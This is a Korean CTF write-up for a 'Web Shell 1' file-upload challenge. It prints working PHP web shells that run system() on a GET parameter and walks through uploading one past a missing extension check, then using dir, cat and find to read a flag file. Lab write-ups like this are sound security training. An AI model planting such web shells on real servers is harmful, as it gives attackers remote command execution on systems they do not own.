[SegFault] (File Vuln) - Web Shell 1

[SegFault] (File Vuln)

Web Shell 1

php 웹 쉘을 올려서, flag.txt 파일을 찾아내라!

문제 파악

본 문제는 File Vulnerability에 관한 문제로서, 'Server Side Script' File, 즉 웹 쉘(Web Shell)을 Upload 하고, 해당 웹 쉘의 업로드 위치를 찾아 실행시켜 flag.txt 파일을 찾는 문제이다.

---

풀이 과정 (해결 방안)

한줄 웹 쉘

기본적인 한 줄 웹쉘은 다음과 같다.

<?php
echo system($_GET['cmd']);           
?>

위와 같은 간단한 웹 쉘을 사용하는 것이 일반적이지만, 브라우저에서 테스트하기 편하도록 아래와 같이 수정한 웹 쉘 코드를 사용할 것이다.

 

사용한 웹 쉘 코드

사용하기 편하도록 수정한 웹 쉘 코드이다.

<?php
    echo 'Enter a Command:<br>';
    echo '<form action="" method="get">';
    echo '<input type="text" name="cmd">';
    echo '<input type="submit">';
    echo '</form>';
    
    if(isset($_GET['cmd'])){
        system($_GET['cmd']);
    }
?>

 

웹 쉘 업로드

게시판의 업로드 기능에서 Server Side Script 파일에 대한 확장자 검증이 이루어지지 않아 (.php) 파일의 업로드가 가능한 것을 확인하였다.

위의 웹 쉘을 업로드 한 후, 다운로드 링크를 확인하면, 해당 파일의 위치를 알 수 있고, 해당 경로는 다음과 같다.

http://ctf.segfaulthub.com:8989/webshell_1/files/gear/web_shell.php

 

flag 찾기

위의 웹쉘 경로를입력하면 브라우저 상에서 다음과 같은 웹 쉘 창을 확인할 수 있다.

현재의 경로는 /webshell_1/files/gear/ 이다. 그러므로 flag.txt 파일을 찾기 위해서는 /webshell_1/ 경로까지 올라가야한다.

dir ../../

위와 같이 입력하여 어떤 디렉터리들이 있는지 확인해 본 결과 important_data라는 디렉터리가 존재하는 것을 확인할 수 있었다.

해당 경로에 존재하는 위의 디렉터리에 접근해봐야 한다.

dir ../../important_data

위와 같이 입력하여 해당 디렉터리의 내부를 확인해 본 결과 flag.txt가 존재하는 것을 확인할 수 있었다.

내용을 확인하기 위해 cat 명령어를 이용한다.

cat ../../important_data/flag.txt

위와 같이 입력한 결과 flag를 획득할 수 있었다.

---

생각해 볼 점

find 명령어를 이용하여 찾을 수도 있었겠지만, 해당 명령어를 이용하려면 찾으려는 파일의 이름을 확실하게 알고 있는 경우에만 가능하기 때문에 직접 찾아보는 방식을 선택하였다.

find 명령어를 사용하는 경우는 다음과 같다.

find / -name flag.txt

---

질문 환영, 수정 및 보완에 대한 지적 환영